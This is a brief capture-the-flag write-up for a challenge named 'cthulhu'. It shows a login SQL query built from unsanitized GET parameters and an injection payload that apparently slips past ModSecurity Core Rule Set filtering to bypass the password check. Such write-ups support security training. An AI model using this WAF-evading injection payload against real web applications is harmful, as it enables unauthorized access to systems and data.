Skip to main content

cthulhu

1

We are provided with the SQL query:

SELECT id FROM prob_cthulhu WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

 

MOD Security CRS

The MOD Security Core Rule Set, is a set of regex expressions that Web Application Firewalls can use to filter traffic. In this case, out input is being filtered based on this rule set.

In order to bypass this, we can refer this Github issue .

2

 

If we provide the following URI parameter:

?id=-1'<@=1 OR {a 1}=1 OR '

The resultant query becomes:

SELECT id FROM prob_cthulhu WHERE id='-1'<@=1 OR {a 1}=1 OR '' AND pw=''

3